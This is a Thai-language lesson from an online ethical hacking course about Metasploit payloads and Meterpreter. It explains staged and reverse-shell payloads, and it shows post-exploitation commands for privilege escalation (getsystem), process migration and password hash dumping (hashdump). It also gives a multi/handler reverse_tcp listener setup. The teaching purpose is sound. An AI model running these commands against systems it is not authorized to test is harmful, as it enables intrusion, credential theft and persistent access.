0Pricing
Ethical Hacking Academy · บทเรียน

เพย์โหลดและ Meterpreter

เชลล์หลังการโจมตี

เพย์โหลดและ Meterpreter เป็นบทเรียน Ethical Hacking Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Ethical Hacking Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

เพย์โหลดคืออะไร

เพย์โหลด คือโค้ดที่ทำงานบนเป้าหมายหลังจากช่องโหว่โจมตีทำงานสำเร็จ โดยกำหนดว่าคุณจะทำอะไรต่อได้บ้าง ตั้งแต่การเรียกใช้คำสั่งเดียวไปจนถึงการเปิดเชลล์แบบโต้ตอบเต็มรูปแบบ

การเลือกเพย์โหลดที่เหมาะสมขึ้นอยู่กับ OS ของเป้าหมาย การตั้งค่าเครือข่าย และระดับการเข้าถึงที่คุณต้องการ

แบบแบ่งระยะเทียบกับแบบไม่แบ่งระยะ

เพย์โหลดมีรูปแบบการส่งมอบสองแบบ:

  • แบบแบ่งระยะ (สังเกต / ใน meterpreter/reverse_tcp): ส่งส่วนเริ่มต้นขนาดเล็กก่อน แล้วจึงดาวน์โหลดเพย์โหลดเต็มรูปแบบ ทำให้มีขนาดเริ่มต้นเล็กกว่า
  • แบบไม่แบ่งระยะ (สังเกต _ ใน meterpreter_reverse_tcp): ส่งเพย์โหลดทั้งหมดในครั้งเดียว มีความน่าเชื่อถือมากกว่าในเครือข่ายที่ไม่เสถียร

เชลล์แบบผูกและแบบย้อนกลับ

ทิศทางการเชื่อมต่อมีสองแบบ:

  • เชลล์แบบผูก: เป้าหมายเปิดพอร์ตและรอ จากนั้นคุณจึงเชื่อมต่อ ไปยัง เป้าหมาย มักถูกไฟร์วอลล์ปิดกั้น
  • เชลล์แบบย้อนกลับ: เป้าหมายเชื่อมต่อกลับมา หาคุณ (LHOST/LPORT) โดยทั่วไปจะผ่านไฟร์วอลล์ที่อนุญาตการเชื่อมต่อขาออกได้

ด้วยเหตุนี้ เพย์โหลดแบบย้อนกลับจึงเป็นค่าเริ่มต้นที่ใช้กันทั่วไป

ทำความรู้จัก Meterpreter

Meterpreter คือเพย์โหลดขั้นสูงของ Metasploit ต่างจากเชลล์คำสั่งพื้นฐานตรงที่ทำงาน ในหน่วยความจำ สื่อสารผ่านช่องทางที่เข้ารหัส และมีชุดคำสั่งจำนวนมากสำหรับการทำงานหลังการโจมตี

เนื่องจากไม่เขียนข้อมูลลงดิสก์ จึงลอบเร้นได้ดีกว่าการวางไฟล์โปรแกรมแยกต่างหาก

คำสั่งหลักของ Meterpreter

เมื่อคุณมีเซสชัน Meterpreter แล้ว คำสั่งพื้นฐานจะช่วยให้คุณทำความเข้าใจสภาพแวดล้อมของเป้าหมาย

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

การถ่ายโอนไฟล์

Meterpreter ย้ายไฟล์ระหว่างเครื่องของคุณกับเป้าหมายด้วยคำสั่งง่าย ๆ ซึ่งมีประโยชน์สำหรับการเก็บหลักฐานหรือเตรียมเครื่องมือในการทดสอบที่ได้รับอนุญาต

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

การเข้าสู่เชลล์ระบบ

คำสั่ง shell จะพาคุณออกจาก Meterpreter ไปยังตัวแปลคำสั่งดั้งเดิมของเป้าหมาย (cmd.exe หรือ /bin/sh) เมื่อคุณต้องการเรียกใช้คำสั่งระดับ OS โดยตรง

พิมพ์ exit เพื่อกลับไปยังพรอมต์ของ Meterpreter โดยไม่ทำให้เซสชันหายไป

shell
# C:\> whoami
# exit  -> back to meterpreter

การยกระดับสิทธิ์

โดยมากคุณจะเข้าสู่ระบบด้วยสิทธิ์ที่จำกัด Meterpreter ช่วยยกระดับสิทธิ์ได้ดังนี้:

  • getsystem จะพยายามใช้เทคนิคที่รู้จักเพื่อให้ได้สิทธิ์ SYSTEM บน Windows
  • โมดูลหลังการโจมตี local_exploit_suggester จะแนะนำช่องโหว่โจมตีเพื่อยกระดับสิทธิ์ภายในเครื่องสำหรับโฮสต์นั้น

สิทธิ์ที่สูงขึ้นช่วยให้เข้าถึงการถ่ายโอนข้อมูลประจำตัวและการเข้าถึงเชิงลึกยิ่งขึ้น

getsystem
run post/multi/recon/local_exploit_suggester

การย้ายกระบวนการ

เซสชันของคุณทำงานอยู่ภายในกระบวนการ หากกระบวนการนั้นไม่เสถียรหรือมีแนวโน้มว่าจะถูกยุติ ให้ใช้ migrate เพื่อย้ายไปยังกระบวนการที่เสถียรกว่าและทำงานต่อเนื่องเป็นเวลานาน เพื่อให้เซสชันยังคงทำงานอยู่

การย้ายไปยังกระบวนการที่มีระดับสิทธิ์ตรงกับคุณยังช่วยให้กลมกลืนกับระบบ และอาจเปลี่ยนบริบทผู้ใช้ของคุณได้

ps
migrate 1340     # migrate into a stable PID

การรักษาการเข้าถึง

Meterpreter มีความสามารถสำหรับเก็บข้อมูลที่เป็นประโยชน์ระหว่างการประเมินที่ได้รับอนุญาต เช่น hashdump เพื่อรวบรวมค่าแฮชรหัสผ่าน และเครื่องมือสแกนแป้นพิมพ์เพื่อสาธิตผลกระทบของการดักจับข้อมูลนำเข้า

ใช้ความสามารถเหล่านี้เฉพาะภายในขอบเขตที่ตกลงกันไว้ และบันทึกทุกอย่างไว้ในรายงานสำหรับลูกค้า

hashdump
run post/windows/gather/checkvm

ตัวรับการเชื่อมต่อ

เพย์โหลดแบบย้อนกลับจำเป็นต้องมีสิ่งที่รอรับฟังอยู่ฝั่งคุณเพื่อรับการเชื่อมต่อ โมดูล multi/handler ทำหน้าที่เป็นตัวรับดังกล่าว คุณต้องกำหนดค่าโดยใช้เพย์โหลด LHOST และ LPORT เดียวกับที่ใช้สร้างเพย์โหลด

สิ่งนี้จำเป็นเมื่อคุณส่งมอบเพย์โหลดจาก msfvenom นอกคอนโซล ให้เริ่มตัวรับการเชื่อมต่อก่อน แล้วจึงเรียกใช้เพย์โหลดบนเป้าหมาย

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

ตรวจสอบอย่างรวดเร็ว

เลือกเพย์โหลดที่สามารถหลบเลี่ยงไฟร์วอลล์ที่เข้มงวดได้

สรุปทบทวน

คุณได้เรียนรู้เรื่องเพย์โหลดและ Meterpreter แล้ว:

  • เพย์โหลดอาจเป็นแบบ แบ่งระยะ (/) หรือ ไม่แบ่งระยะ (_) และอาจเป็นแบบ ผูก หรือ ย้อนกลับ โดยแบบย้อนกลับมักผ่านไฟร์วอลล์ได้ดีกว่า
  • Meterpreter ทำงานในหน่วยความจำผ่านช่องทางที่เข้ารหัส พร้อมคำสั่งจำนวนมาก
  • งานหลัก ได้แก่ sysinfo, getuid, ps, download/upload, shell
  • ยกระดับสิทธิ์ด้วย getsystem และ local_exploit_suggester และใช้ migrate เพื่อความเสถียร
  • ใช้ความสามารถในการเก็บข้อมูลเฉพาะภายในขอบเขต และบันทึกทุกอย่าง

ถัดไป: โมดูลหลังการโจมตี การใช้เส้นทางผ่านระบบ และการเก็บข้อมูล

คำถามที่พบบ่อย

บทเรียน “เพย์โหลดและ Meterpreter” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “เพย์โหลดและ Meterpreter” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Ethical Hacking Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Ethical Hacking Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “เพย์โหลดและ Meterpreter”

เชลล์หลังการโจมตี คุณปฏิบัติ Ethical Hacking Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Ethical Hacking Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Ethical Hacking Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 3 จากทั้งหมด 4 บทเรียน

บทเรียน “เพย์โหลดและ Meterpreter” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Ethical Hacking Academy นี้ได้ไหม

ได้ บทเรียน Ethical Hacking Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit
  2. การค้นหาและใช้ช่องโหว่
  3. เพย์โหลดและ Meterpreter
  4. มอดูลหลังการโจมตี
← กลับไปที่ Ethical Hacking Academy